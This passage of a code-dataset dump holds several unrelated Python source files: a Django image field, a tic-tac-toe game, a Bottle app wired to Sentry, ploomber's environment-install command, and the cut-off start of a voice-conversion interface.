snippet image. Value from 0 to 1.\n :type brightness: float\n :param font_color: Font color in RGBA. By default is (255, 255, 255, 255).\n :type font_color: tuple(int, int, int, int)\n :param font_size: Size of snippet image text. By default is 64.\n :type font_size: int\n :param padding: Text indents to the left and right of the snippet image.\n Value from 0 to 1.\n 0 - 0% width;\n 1 - 100% width.\n :type padding: float\n :param center : Background image center for crop and resize image. 
tuple(x, y).\n Defaults is center of background image.\n :type center: tuple(int, int)\n\n ImageField params:\n :param verbose_name:\n :param name:\n :param width_field:\n :param height_field:\n :param upload_to:\n :param storage:\n \"\"\"\n self.snippet_type = snippet_type\n self.kwargs = self.extract_specific_kwargs(kwargs)\n kwargs['blank'] = True\n super().__init__(**kwargs)\n\n def pre_save(self, instance, add):\n file = getattr(instance, self.attname)\n\n if (not file or not file.file) and self.should_be_created(instance):\n file_name = self.get_file_name()\n data = self.collect_data(instance)\n image = self.create_snippet_image(data)\n file.save(file_name, image, save=False)\n elif not file._committed:\n file.save(file.name, file.file, save=False)\n\n return file\n\n def deconstruct(self):\n name, path, args, kwargs = super().deconstruct()\n\n specific_attributes_values = self.get_specific_deconstruct_kwargs()\n kwargs.update(specific_attributes_values)\n\n return name, path, args, kwargs\n","repo_name":"acrius/django-snippet-image","sub_path":"django_snippet_image/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14383974992","text":"'''\n Text Based 2-Player Tic Tac Toe Game\n '''\n\nimport random\n\n''' Tic Tac Toe Game Structure '''\n# Step 1 -: Create a function that would list the instructions of the game\n# Step 2 -: Create a function that would display the board\n# Step 3 -: Create a function to allow players to choose between X and O\n# Step 4 -: Create a game environment that continues to play the game until there's a winner or all spaces are filled\n# Step 5 -: Create a function or logic flow with data validation that allows players to make moves on the board\n# Step 6 -: Create a function or conditional logic that checks win for X or O\n# Step 7 -: If there is a winner display the player who won the game\n# Step 8 -: Ask if the user wants to play game. If yes, repeat the game from the beginning, else, end the game.\n\ndef instructions():\n # A function that would list the instructions of the game\n\n print('Tic Tac Toe \\n')\n print('How to play: ')\n print('1.) Both players will choose whether to be \"X\" or \"O\" ')\n print('2.) To even the odds of winning, players will be randomly chosen to start ')\n print('3. On the board, players can choose the position with numbers from 1-9')\n print('3.) The first player to achieve a straight, horizontal, or vertical wins the game')\n print('4.) 
If players want to play again, press \"Y\" at the end of each game, or press \"N\" to end the game \\n')\n\n print('Each position on the board is based on a numerical position from 1-9 \\n')\n print(f' {1} | {2} | {3} ')\n print('---------------')\n print(f' {4} | {5} | {6} ')\n print('---------------')\n print(f' {7} | {8} | {9} ')\n print('')\n\ndef display_board(list):\n # A function that displays the board after each move\n\n print(list[0],' | ',list[1],' | ',list[2])\n print('---------------')\n print(list[3],' | ',list[4],' | ',list[5])\n print('---------------')\n print(list[6],' | ', list[7],' | ',list[8])\n print('')\n\ndef player_choice():\n # A function that allows players to choose between X and O with data validation\n\n while True:\n player1 = input('Please choose between \"X\" or \"O\": ').upper()\n print(\"\")\n\n if player1.upper() == \"X\" or player1.upper() == \"O\":\n print(f'Player 1 is {player1}')\n break\n\n else:\n print('Invalid entry. Please choose between \"X\" and \"O\" ')\n print(\"\")\n\n return player1\n\n\ndef check_winner(list):\n ''' Checks for winners for X and O '''\n\n # Diagonal Checks for X\n if list[0].upper() == 'X' and list[4].upper() == 'X' and list[8].upper() == 'X':\n return 'X has won'\n\n elif list[2].upper() == 'X' and list[4].upper() == 'X' and list[6].upper() == 'X':\n return 'X has won'\n\n # Vertical Checks for X\n\n elif list[0].upper() == 'X' and list[3].upper() == 'X' and list[6].upper() == 'X':\n return 'X has won'\n\n elif list[1].upper() == 'X' and list[4].upper() == 'X' and list[7].upper() == 'X':\n return 'X has won'\n\n\n elif list[2].upper() == 'X' and list[5].upper() == 'X' and list[8].upper() == 'X':\n return 'X has won'\n\n\n # Horizontal Checks for X\n\n elif list[0].upper() == 'X' and list[1].upper() == 'X' and list[2].upper() == 'X':\n return 'X has won'\n\n\n elif list[3].upper() == 'X' and list[4].upper() == 'X' and list[5].upper() == 'X':\n return 'X has won'\n\n elif list[6].upper() == 'X' and list[7].upper() == 'X' and list[8].upper() == 'X':\n return 'X has won'\n\n ''' Check for O wins '''\n\n # Diagonal Checks for O\n if list[0].upper() == 'O' and list[4].upper() == 'O' and list[8].upper() == 'O':\n return 'O has won'\n\n elif list[2].upper() == 'O' and list[4].upper() == 'O' and list[6].upper() == 'O':\n return 'O has won'\n\n\n # Vertical Checks for O\n\n elif list[0].upper() == 'O' and list[3].upper() == 'O' and list[6].upper() == 'O':\n return 'O has won'\n\n elif list[1].upper() == 'O' and list[4].upper() == 'O' and list[7].upper() == 'O':\n return 'O has won'\n\n elif list[2].upper() == 'O' and list[5].upper() == 'O' and list[8].upper() == 'O':\n return 'O has won'\n\n\n # Horizontal Checks for O\n\n elif list[0].upper() == 'O' and list[1].upper() == 'O' and list[2].upper() == 'O':\n return 'O has won'\n\n elif list[3].upper() == 'O' and list[4].upper() == 'O' and list[5].upper() == 'O':\n return 'O has won'\n\n elif list[6].upper() == 'O' and list[7].upper() == 'O' and list[8].upper() == 'O':\n return 'O has won'\n\n\ndef play_game():\n # A function with logic flow and data validation that allows players to make moves on the board\n\n moves_list = ['','','','','','','','','']\n move_range = [1,2,3,4,5,6,7,8,9]\n player1 = player_choice()\n\n if player1.upper() == 'X':\n player2 = 'O'\n print(f'Player 2 is {player2}\\n')\n\n elif player1.upper() == 'O':\n player2 = 'X'\n print(f'Player 2 is {player2}\\n')\n\n move_count = 0\n\n player_select = [player1,player2]\n random.shuffle(player_select)\n\n if 
player_select[0].upper() == player1:\n print(f'Player 1 ({player1}) to start\\n')\n\n elif player_select[0].upper() == player2:\n print(f'Player 2 ({player2}) to start\\n')\n\n display_board(moves_list)\n\n game_over = ''\n\n # Start the Game\n while move_count != 9:\n\n while True:\n # Player 1 / First Move\n player_move = input(f'({player_select[0]}) Please enter a position on the board (1-9): ')\n print('')\n\n if player_move.isdigit() == True:\n\n player_move = int(player_move)\n\n if player_move in move_range and moves_list[player_move - 1] == '':\n moves_list[player_move-1] = player_select[0]\n display_board(moves_list)\n move_count += 1\n game_over = check_winner(moves_list)\n break\n\n elif player_move in move_range and moves_list[player_move - 1] != '':\n # Stops players from choosing the same position\n print('This position is already taken. Please try again.\\n')\n continue\n\n else:\n print('Please choose a position between 1-9 \\n')\n continue\n\n else:\n print('That is an invalid entry. Please try again \\n')\n continue\n\n\n if str(game_over) == f'{player_select[0]} has won':\n print(game_over + '\\n')\n move_count = 9\n break\n\n elif game_over == f'{player_select[0]} has won' and move_count == 9:\n print(\"It's a draw \\n\")\n\n while move_count != 9:\n # Player 2 / Second Move\n game_over = str(check_winner(moves_list))\n\n\n player_move = input(f'({player_select[1]}) Please enter a position on the board (1-9): ')\n print('')\n\n if player_move.isdigit() == True:\n player_move = int(player_move)\n\n\n if player_move in move_range and moves_list[player_move - 1] == '':\n moves_list[player_move-1] = player_select[1]\n display_board(moves_list)\n move_count += 1\n game_over = check_winner(moves_list)\n break\n\n elif game_over == f'{player2} has won':\n move_count = 9\n break\n\n elif player_move in move_range and moves_list[player_move - 1] != '':\n # Stops players from choosing the same position\n print('This position is already taken. Please try again.\\n')\n continue\n\n else:\n print('Please choose a position between 1-9 \\n')\n continue\n\n else:\n print('That is an invalid entry. Please try again \\n')\n continue\n\n if str(game_over) == f'{player_select[1]} has won':\n print(game_over + '\\n')\n move_count = 9\n break\n\n elif game_over != f'{player_select[1]} has won' and move_count == 9:\n print(\"It's a draw \\n\")\n\n\n# Start the Official Game of Tic Tac Toe\n\ninstructions()\n\nstart_game = True\n\nwhile start_game:\n play_game()\n\n while True:\n reset_game = input('Press \"Y\" to play again or Press \"N\" to end the game: ')\n print('')\n\n if reset_game.upper() == 'Y':\n break\n\n elif reset_game.upper() == 'N':\n print('Thank you for playing!!!')\n start_game = False\n break\n\n else:\n print('Invalid Entry. Please try again \\n')\n\n","repo_name":"Nnamo23/My_Personal_Projects","sub_path":"Project 1: Text Based Tic Tac Toe/Tic-Tac-Toe.py","file_name":"Tic-Tac-Toe.py","file_ext":"py","file_size_in_byte":8719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39685187010","text":"import sentry_sdk\r\nimport os\r\nfrom bottle import Bottle, request, route, run\r\nfrom sentry_sdk.integrations.bottle import BottleIntegration\r\n\r\nsentry_sdk.init(\r\n dsn=\"https://07c92891bb8749ccbda5d4e34505f8cf@o399508.ingest.sentry.io/5256758\",\r\n integrations=[BottleIntegration()]\r\n)\r\n\r\n\r\n@route('/') \r\ndef index():\r\n html = \"\"\"\r\n\r\n\r\n \r\n info\r\n \r\n \r\n
        \r\n        This is the main page.\r\n        \r\n        \r\n \r\n\r\n\"\"\"\r\n    return html \r\n\r\n@route('/success') \r\ndef index():\r\n    html = \"\"\"\r\n\r\n\r\n \r\n The page where everything works!!!\r\n \r\n \r\n        \r\n        Everything works!\r\n        \r\n
        \r\n \r\n\r\n\"\"\"\r\n return html \r\n\r\n@route('/fail') \r\ndef index(): \r\n raise RuntimeError(\"There is an error!\") \r\n return \r\n \r\n \r\nif os.environ.get(\"APP_LOCATION\") == \"heroku\":\r\n run(\r\n host=\"0.0.0.0\",\r\n port=int(os.environ.get(\"PORT\", 5000)),\r\n server=\"gunicorn\",\r\n workers=3,\r\n )\r\nelse:\r\n run(host=\"localhost\", port=8080, debug=True)","repo_name":"daftgrey/skillfactory-D2","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18980364539","text":"\"\"\"\nImplementation of:\n\n$ plomber install\n\nThis command runs a bunch of pip/conda commands (depending on what's available)\nand it does the *right thing*: creating a new environment if needed, and\nlocking dependencies.\n\"\"\"\nimport sys\nimport json\nimport os\nimport shutil\nfrom pathlib import Path\nfrom contextlib import contextmanager\n\nimport click\nimport yaml\n\nfrom ploomber.io._commander import Commander\nfrom ploomber_core.exceptions import BaseException\nfrom ploomber.util.util import check_mixed_envs\nfrom ploomber.cli.io import command_endpoint\nfrom ploomber.util._sys import _python_bin\nfrom ploomber.telemetry import telemetry\n\n_SETUP_PY = \"setup.py\"\n\n_REQS_LOCK_TXT = \"requirements.lock.txt\"\n_REQS_TXT = \"requirements.txt\"\n\n_ENV_YML = \"environment.yml\"\n_ENV_LOCK_YML = \"environment.lock.yml\"\n\n_PYTHON_BIN_NAME = _python_bin()\n\n\n@command_endpoint\n@telemetry.log_call(\"install\")\ndef main(use_lock, create_env=None, use_venv=False):\n \"\"\"\n Install project, automatically detecting if it's a conda-based or pip-based\n project.\n\n Parameters\n ---------\n use_lock : bool\n If True Uses requirements.lock.txt/environment.lock.yml and\n requirements.dev.lock.txt/environment.dev.lock.yml files. If False\n uses regular files and creates the lock ones after installing\n dependencies. If None, it uses lock files if they exist, if they don't\n it uses regular files\n\n create_env : bool, default=None\n If True, creates a new environment, if False, it installs in the\n current environment. If None, it creates a new environment if there\n isn't one already active\n\n use_venv : bool, default=False\n Force to use Python's venv module, ignoring conda if installed\n \"\"\"\n USE_CONDA = shutil.which(\"conda\") and not use_venv\n ENV_YML_EXISTS = Path(_ENV_YML).exists()\n ENV_LOCK_YML_EXISTS = Path(_ENV_LOCK_YML).exists()\n REQS_TXT_EXISTS = Path(_REQS_TXT).exists()\n REQS_LOCK_TXT_EXISTS = Path(_REQS_LOCK_TXT).exists()\n\n if use_lock is None:\n if USE_CONDA:\n use_lock = ENV_LOCK_YML_EXISTS\n else:\n use_lock = REQS_LOCK_TXT_EXISTS\n\n if use_lock and not ENV_LOCK_YML_EXISTS and not REQS_LOCK_TXT_EXISTS:\n raise BaseException(\n \"Expected an environment.lock.yaml \"\n \"(conda) or requirements.lock.txt (pip) in the current \"\n \"directory. Add one of them and try again.\",\n type_=\"no_lock\",\n )\n elif not use_lock and not ENV_YML_EXISTS and not REQS_TXT_EXISTS:\n raise BaseException(\n \"Expected an environment.yaml (conda)\"\n \" or requirements.txt (pip) in the current directory.\"\n \" Add one of them and try again.\",\n type_=\"no_env_requirements\",\n )\n elif (\n not USE_CONDA and use_lock and ENV_LOCK_YML_EXISTS and not REQS_LOCK_TXT_EXISTS\n ):\n raise BaseException(\n \"Found env environment.lock.yaml \"\n \"but conda is not installed. 
Install conda or add a \"\n \"requirements.lock.txt to use pip instead\",\n type_=\"no_conda\",\n )\n elif not USE_CONDA and not use_lock and ENV_YML_EXISTS and not REQS_TXT_EXISTS:\n raise BaseException(\n \"Found environment.yaml but conda is not installed.\"\n \" Install conda or add a requirements.txt to use pip instead\",\n type_=\"no_conda2\",\n )\n elif USE_CONDA and use_lock and ENV_LOCK_YML_EXISTS:\n # TODO: emit warnings if unused requirements.txt?\n main_conda(\n use_lock=True,\n create_env=create_env\n if create_env is not None\n else _should_create_conda_env(),\n )\n elif USE_CONDA and not use_lock and ENV_YML_EXISTS:\n # TODO: emit warnings if unused requirements.txt?\n main_conda(\n use_lock=False,\n create_env=create_env\n if create_env is not None\n else _should_create_conda_env(),\n )\n else:\n # TODO: emit warnings if unused environment.yml?\n main_pip(\n use_lock=use_lock,\n create_env=create_env if create_env is not None else not _in_virtualenv(),\n )\n\n\ndef _get_base_prefix_compat():\n \"\"\"\n This function will find the pip virtualenv with different python versions.\n Get base/real prefix, or sys.prefix if there is none.\n \"\"\"\n return (\n getattr(sys, \"base_prefix\", None)\n or sys.prefix\n or getattr(sys, \"real_prefix\", None)\n )\n\n\ndef _in_virtualenv():\n return _get_base_prefix_compat() != sys.prefix\n\n\ndef main_pip(use_lock, create_env=True):\n \"\"\"\n Install pip-based project (uses venv), looks for requirements.txt files\n\n Parameters\n ----------\n start_time : datetime\n The initial runtime of the function.\n\n use_lock : bool\n If True Uses requirements.txt and requirements.dev.lock.txt files\n\n create_env : bool\n If True, it uses the venv module to create a new virtual environment,\n then installs the dependencies, otherwise it installs the dependencies\n in the current environment\n \"\"\"\n reqs_txt = _REQS_LOCK_TXT if use_lock else _REQS_TXT\n reqs_dev_txt = \"requirements.dev.lock.txt\" if use_lock else \"requirements.dev.txt\"\n\n cmdr = Commander()\n\n # TODO: modify readme to add how to activate env? probably also in conda\n name = Path(\".\").resolve().name\n\n try:\n _run_pip_commands(cmdr, create_env, name, reqs_dev_txt, reqs_txt, use_lock)\n except Exception as e:\n cmd = f\"pip install --requirement {reqs_txt}\"\n raise BaseException(\n \"Failed to setup your environment. 
\" f\"Invoke pip manually.\\n{cmd}\\n\\n\"\n ) from e\n\n\ndef _run_pip_commands(cmdr, create_env, name, reqs_dev_txt, reqs_txt, use_lock):\n if create_env:\n venv_dir = f\"venv-{name}\"\n cmdr.print(\"Creating venv...\")\n cmdr.run(_PYTHON_BIN_NAME, \"-m\", \"venv\", venv_dir, description=\"Creating venv\")\n\n # add venv_dir to .gitignore if it doesn't exist\n if Path(\".gitignore\").exists():\n with open(\".gitignore\") as f:\n if venv_dir not in f.read():\n cmdr.append_inline(venv_dir, \".gitignore\")\n else:\n cmdr.append_inline(venv_dir, \".gitignore\")\n\n folder, bin_name = _get_pip_folder_and_bin_name()\n pip = str(Path(venv_dir, folder, bin_name))\n\n if os.name == \"nt\":\n cmd_activate = f\"{venv_dir}\\\\Scripts\\\\Activate.ps1\"\n else:\n cmd_activate = f\"source {venv_dir}/bin/activate\"\n else:\n cmdr.print(\"Installing in current venv...\")\n pip = \"pip\"\n cmd_activate = None\n\n # FIXME: using an old version of pip may lead to broken environments, so\n # we need to ensure we upgrade before installing dependencies.\n\n if Path(_SETUP_PY).exists():\n _pip_install_setup_py_pip(cmdr, pip)\n\n _pip_install(cmdr, pip, lock=not use_lock, requirements=reqs_txt)\n\n if Path(reqs_dev_txt).exists():\n _pip_install(cmdr, pip, lock=not use_lock, requirements=reqs_dev_txt)\n\n _next_steps(cmdr, cmd_activate)\n\n\ndef main_conda(use_lock, create_env=True):\n \"\"\"\n Install conda-based project, looks for environment.yml files\n\n Parameters\n ----------\n use_lock : bool\n If True Uses environment.lock.yml and environment.dev.lock.yml files\n\n\n create_env : bool\n If True, it uses the venv module to create a new virtual environment,\n then installs the dependencies, otherwise it installs the dependencies\n in the current environment\n \"\"\"\n env_yml = _ENV_LOCK_YML if use_lock else _ENV_YML\n\n # TODO: ensure ploomber-scaffold includes dependency file (including\n # lock files in MANIFEST.in\n cmdr = Commander()\n\n # TODO: provide helpful error messages on each command\n\n if create_env:\n with open(env_yml) as f:\n env_name = yaml.safe_load(f)[\"name\"]\n\n current_env = _current_conda_env_name()\n\n if env_name == current_env:\n err = (\n f\"{env_yml} will create an environment \"\n f\"named {env_name!r}, which is the current active \"\n \"environment. 
Activate a different one and try \"\n \"again: conda activate base\"\n )\n telemetry.log_api(\n \"install-error\",\n metadata={\"type\": \"env_running_conflict\", \"exception\": err},\n )\n raise BaseException(err)\n else:\n env_name = _current_conda_env_name()\n\n # get current installed envs\n conda = shutil.which(\"conda\")\n mamba = shutil.which(\"mamba\")\n\n # if already installed and running on windows, ask to delete first,\n # otherwise it might lead to an intermittent error (permission denied\n # on vcruntime140.dll)\n if os.name == \"nt\" and create_env:\n envs = cmdr.run(conda, \"env\", \"list\", \"--json\", capture_output=True)\n already_installed = any(\n [\n env\n for env in json.loads(envs)[\"envs\"]\n # only check in the envs folder, ignore envs in other locations\n if \"envs\" in env and env_name in env\n ]\n )\n\n if already_installed:\n err = (\n f\"Environment {env_name!r} already exists, \"\n f\"delete it and try again \"\n f\"(conda env remove --name {env_name})\"\n )\n telemetry.log_api(\n \"install-error\", metadata={\"type\": \"duplicate_env\", \"exception\": err}\n )\n raise BaseException(err)\n\n pkg_manager = mamba if mamba else conda\n\n try:\n _run_conda_commands(\n cmdr, pkg_manager, create_env, env_yml, env_name, use_lock, conda\n )\n except Exception as e:\n if create_env:\n cmd = f\"conda env create --file {env_yml} --force\"\n else:\n cmd = f\"conda env update --file {env_yml} --name {env_name}\"\n raise BaseException(\n \"Failed to setup your environment. \" f\"Invoke conda manually.\\n{cmd}\\n\\n\"\n ) from e\n\n\ndef _run_conda_commands(\n cmdr,\n pkg_manager,\n create_env,\n env_yml,\n env_name,\n use_lock,\n conda,\n):\n if create_env:\n cmdr.print(\"Creating conda env...\")\n cmdr.run(\n pkg_manager,\n \"env\",\n \"create\",\n \"--file\",\n env_yml,\n \"--force\",\n description=\"Creating env\",\n )\n else:\n cmdr.print(\"Installing in current conda env...\")\n\n cmdr.run(\n pkg_manager,\n \"env\",\n \"update\",\n \"--file\",\n env_yml,\n \"--name\",\n env_name,\n description=\"Installing dependencies\",\n )\n\n if Path(_SETUP_PY).exists():\n _pip_install_setup_py_conda(cmdr, env_name)\n\n if not use_lock:\n env_lock = cmdr.run(\n conda,\n \"env\",\n \"export\",\n \"--no-build\",\n \"--name\",\n env_name,\n description=\"Locking dependencies\",\n capture_output=True,\n )\n Path(_ENV_LOCK_YML).write_text(env_lock)\n\n _try_conda_install_and_lock_dev(cmdr, pkg_manager, env_name, use_lock=use_lock)\n\n cmd_activate = f\"conda activate {env_name}\" if create_env else None\n _next_steps(cmdr, cmd_activate)\n\n\ndef _is_conda():\n \"\"\"\n The function will tell if the code is running in a conda env\n \"\"\"\n conda_path = Path(sys.prefix, \"conda-meta\")\n return (\n conda_path.exists()\n or os.environ.get(\"CONDA_PREFIX\", False)\n or os.environ.get(\"CONDA_DEFAULT_ENV\", False)\n )\n\n\ndef _should_create_conda_env():\n # not in conda env or running in base conda env\n is_conda = _is_conda()\n return not is_conda or (is_conda and _current_conda_env_name() == \"base\")\n\n\ndef _current_conda_env_name():\n return os.environ.get(\"CONDA_DEFAULT_ENV\") or Path(sys.executable).parents[1].name\n\n\ndef _get_pip_folder_and_bin_name():\n folder = \"Scripts\" if os.name == \"nt\" else \"bin\"\n bin_name = \"pip.exe\" if os.name == \"nt\" else \"pip\"\n return folder, bin_name\n\n\ndef _find_conda_root(conda_bin):\n conda_bin = Path(conda_bin)\n\n for parent in conda_bin.parents:\n # I've seen variations of this. 
on windows: Miniconda3 and miniconda3\n # on linux miniconda3, anaconda and miniconda\n if parent.name.lower() in {\"miniconda3\", \"miniconda\", \"anaconda3\"}:\n return parent\n err = (\n \"Failed to locate conda root from \"\n f\"directory: {str(conda_bin)!r}. Please submit an issue: \"\n \"https://github.com/ploomber/ploomber/issues/new\"\n )\n telemetry.log_api(\n \"install-error\", metadata={\"type\": \"no_conda_root\", \"exception\": err}\n )\n raise BaseException(err)\n\n\ndef _path_to_pip_in_env_with_name(conda_bin, env_name):\n conda_root = _find_conda_root(conda_bin)\n folder, bin_name = _get_pip_folder_and_bin_name()\n return str(conda_root / \"envs\" / env_name / folder / bin_name)\n\n\ndef _locate_pip_inside_conda(env_name):\n \"\"\"\n Locates pip inside the conda env with a given name\n \"\"\"\n pip = _path_to_pip_in_env_with_name(shutil.which(\"conda\"), env_name)\n\n # this might happen if the environment does not contain python/pip\n if not Path(pip).exists():\n err = (\n f\"Could not locate pip in environment {env_name!r}, make sure \"\n \"it is included in your environment.yml and try again\"\n )\n telemetry.log_api(\n \"install-error\", metadata={\"type\": \"no_pip_env\", \"exception\": err}\n )\n raise BaseException(err)\n\n return pip\n\n\ndef _pip_install_setup_py_conda(cmdr, env_name):\n \"\"\"\n Call \"pip install --editable .\" if setup.py exists. Automatically locates\n the appropriate pip binary inside the conda env given the env name\n \"\"\"\n pip = _locate_pip_inside_conda(env_name)\n _pip_install_setup_py_pip(cmdr, pip)\n\n\ndef _pip_install_setup_py_pip(cmdr, pip):\n cmdr.run(pip, \"install\", \"--editable\", \".\", description=\"Installing project\")\n\n\ndef _try_conda_install_and_lock_dev(cmdr, pkg_manager, env_name, use_lock):\n env_yml = \"environment.dev.lock.yml\" if use_lock else \"environment.dev.yml\"\n\n if Path(env_yml).exists():\n cmdr.run(\n pkg_manager,\n \"env\",\n \"update\",\n \"--file\",\n env_yml,\n \"--name\",\n env_name,\n description=\"Installing dev dependencies\",\n )\n\n if not use_lock:\n env_lock = cmdr.run(\n shutil.which(\"conda\"),\n \"env\",\n \"export\",\n \"--no-build\",\n \"--name\",\n env_name,\n description=\"Locking dev dependencies\",\n capture_output=True,\n )\n Path(\"environment.dev.lock.yml\").write_text(env_lock)\n\n\ndef _next_steps(cmdr, cmd_activate):\n cmdr.success(\"Next steps\")\n message = f\"$ {cmd_activate}\\n\" if cmd_activate else \"\"\n cmdr.print((f\"{message}$ ploomber build\"))\n cmdr.success()\n\n\ndef _pip_install(cmdr, pip, lock, requirements=_REQS_TXT):\n \"\"\"Install and freeze requirements\n\n Parameters\n ----------\n cmdr\n Commander instance\n\n pip\n Path to pip binary\n\n lock\n If true, locks dependencies and stores them in a requirements.lock.txt\n \"\"\"\n cmdr.run(\n pip,\n \"install\",\n \"--requirement\",\n requirements,\n description=\"Installing dependencies\",\n )\n\n if lock:\n pip_lock = cmdr.run(\n pip,\n \"freeze\",\n \"--exclude-editable\",\n description=\"Locking dependencies\",\n capture_output=True,\n )\n check_mixed_envs(pip_lock)\n name = Path(requirements).stem\n Path(f\"{name}.lock.txt\").write_text(pip_lock)\n\n\ndef _environment_yml_has_python(path):\n with open(path) as f:\n env_yml = yaml.safe_load(f)\n\n deps = env_yml.get(\"dependencies\", [])\n\n has_python = False\n idx = None\n\n for i, line in enumerate(deps):\n if isinstance(line, str) and line.startswith(\"python\"):\n has_python = True\n idx = i\n break\n\n if has_python:\n 
env_yml[\"dependencies\"].pop(idx)\n\n return has_python, env_yml\n\n\n@contextmanager\ndef check_environment_yaml(path, enable=True):\n has_python, env_yml = _environment_yml_has_python(path)\n TMP_FILENAME = \".ploomber-conda-tmp.yml\"\n\n if has_python and enable:\n path_to_use = Path(TMP_FILENAME)\n path_to_use.write_text(yaml.dump(env_yml))\n click.secho(\n f\"WARNING: {path!r} contains Python as \"\n \"dependency, ignoring it as it may break \"\n \"the current environment\",\n fg=\"yellow\",\n )\n else:\n path_to_use = Path(path)\n\n try:\n yield str(path_to_use)\n finally:\n if Path(TMP_FILENAME).exists():\n path_to_use.unlink()\n","repo_name":"ploomber/ploomber","sub_path":"src/ploomber/cli/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":17063,"program_lang":"python","lang":"en","doc_type":"code","stars":3258,"dataset":"github-code","pt":"66"} +{"seq_id":"40540222346","text":"from multiprocessing import cpu_count\r\nimport threading\r\nfrom time import sleep\r\nfrom subprocess import Popen,PIPE,run as runn\r\nfrom time import sleep\r\nimport torch, pdb, os,traceback,sys,warnings,shutil,numpy as np,faiss\r\n#判断是否有能用来训练和加速推理的N卡\r\nncpu=cpu_count()\r\nngpu=torch.cuda.device_count()\r\ngpu_infos=[]\r\nif(torch.cuda.is_available()==False or ngpu==0):if_gpu_ok=False\r\nelse:\r\n if_gpu_ok = False\r\n for i in range(ngpu):\r\n gpu_name=torch.cuda.get_device_name(i)\r\n if(\"16\"in gpu_name or \"MX\"in gpu_name):continue\r\n if(\"10\"in gpu_name or \"20\"in gpu_name or \"30\"in gpu_name or \"40\"in gpu_name or \"A50\"in gpu_name.upper() or \"70\"in gpu_name or \"80\"in gpu_name or \"90\"in gpu_name or \"M4\"in gpu_name or \"T4\"in gpu_name or \"TITAN\"in gpu_name.upper()):#A10#A100#V100#A40#P40#M40#K80\r\n if_gpu_ok=True#至少有一张能用的N卡\r\n gpu_infos.append(\"%s\\t%s\"%(i,gpu_name))\r\ngpu_info=\"\\n\".join(gpu_infos)if if_gpu_ok==True and len(gpu_infos)>0 else \"很遗憾您这没有能用的显卡来支持您训练\"\r\ngpus=\"-\".join([i[0]for i in gpu_infos])\r\nnow_dir=os.getcwd()\r\nsys.path.append(now_dir)\r\ntmp=os.path.join(now_dir,\"TEMP\")\r\nshutil.rmtree(tmp,ignore_errors=True)\r\nos.makedirs(tmp,exist_ok=True)\r\nos.makedirs(os.path.join(now_dir,\"logs\"),exist_ok=True)\r\nos.makedirs(os.path.join(now_dir,\"weights\"),exist_ok=True)\r\nos.environ[\"TEMP\"]=tmp\r\nwarnings.filterwarnings(\"ignore\")\r\ntorch.manual_seed(114514)\r\nfrom infer_pack.models import SynthesizerTrnMs256NSFsid, SynthesizerTrnMs256NSFsid_nono\r\nfrom scipy.io import wavfile\r\nfrom fairseq import checkpoint_utils\r\nimport gradio as gr\r\nimport librosa\r\nimport logging\r\nfrom vc_infer_pipeline import VC\r\nimport soundfile as sf\r\nfrom config import is_half,device,is_half\r\nfrom infer_uvr5 import _audio_pre_\r\nfrom my_utils import load_audio\r\nfrom train.process_ckpt import show_info,change_info,merge,extract_small_model\r\n# from trainset_preprocess_pipeline import PreProcess\r\nlogging.getLogger('numba').setLevel(logging.WARNING)\r\n\r\nclass ToolButton(gr.Button, gr.components.FormComponent):\r\n \"\"\"Small button with single emoji as text, fits inside gradio forms\"\"\"\r\n def __init__(self, **kwargs):\r\n super().__init__(variant=\"tool\", **kwargs)\r\n def get_block_name(self):\r\n return \"button\"\r\n\r\nhubert_model=None\r\ndef load_hubert():\r\n global hubert_model\r\n models, saved_cfg, task = checkpoint_utils.load_model_ensemble_and_task([\"hubert_base.pt\"],suffix=\"\",)\r\n hubert_model = models[0]\r\n hubert_model = hubert_model.to(device)\r\n if(is_half):hubert_model = hubert_model.half()\r\n 
else:hubert_model = hubert_model.float()\r\n    hubert_model.eval()\r\n\r\nweight_root=\"weights\"\r\nweight_uvr5_root=\"uvr5_weights\"\r\nnames=[]\r\nfor name in os.listdir(weight_root):names.append(name)\r\nuvr5_names=[]\r\nfor name in os.listdir(weight_uvr5_root):uvr5_names.append(name.replace(\".pth\",\"\"))\r\n\r\ndef vc_single(sid,input_audio,f0_up_key,f0_file,f0_method,file_index,file_big_npy,index_rate):#spk_item, input_audio0, vc_transform0,f0_file,f0method0\r\n    global tgt_sr,net_g,vc,hubert_model\r\n    if input_audio is None:return \"You need to upload an audio\", None\r\n    f0_up_key = int(f0_up_key)\r\n    try:\r\n        audio=load_audio(input_audio,16000)\r\n        times = [0, 0, 0]\r\n        if(hubert_model==None):load_hubert()\r\n        if_f0 = cpt.get(\"f0\", 1)\r\n        audio_opt=vc.pipeline(hubert_model,net_g,sid,audio,times,f0_up_key,f0_method,file_index,file_big_npy,index_rate,if_f0,f0_file=f0_file)\r\n        print(times)\r\n        return \"Success\", (tgt_sr, audio_opt)\r\n    except:\r\n        info=traceback.format_exc()\r\n        print(info)\r\n        return info,(None,None)\r\n\r\ndef vc_multi(sid,dir_path,opt_root,paths,f0_up_key,f0_method,file_index,file_big_npy,index_rate):\r\n    try:\r\n        dir_path=dir_path.strip(\" \")# keep novice users from pasting paths with leading/trailing spaces\r\n        opt_root=opt_root.strip(\" \")\r\n        os.makedirs(opt_root, exist_ok=True)\r\n        try:\r\n            if(dir_path!=\"\"):paths=[os.path.join(dir_path,name)for name in os.listdir(dir_path)]\r\n            else:paths=[path.name for path in paths]\r\n        except:\r\n            traceback.print_exc()\r\n            paths = [path.name for path in paths]\r\n        infos=[]\r\n        for path in paths:\r\n            info,opt=vc_single(sid,path,f0_up_key,None,f0_method,file_index,file_big_npy,index_rate)\r\n            if(info==\"Success\"):\r\n                try:\r\n                    tgt_sr,audio_opt=opt\r\n                    wavfile.write(\"%s/%s\" % (opt_root, os.path.basename(path)), tgt_sr, audio_opt)\r\n                except:\r\n                    info=traceback.format_exc()\r\n            infos.append(\"%s->%s\"%(os.path.basename(path),info))\r\n            yield \"\\n\".join(infos)\r\n        yield \"\\n\".join(infos)\r\n    except:\r\n        yield traceback.format_exc()\r\n\r\ndef 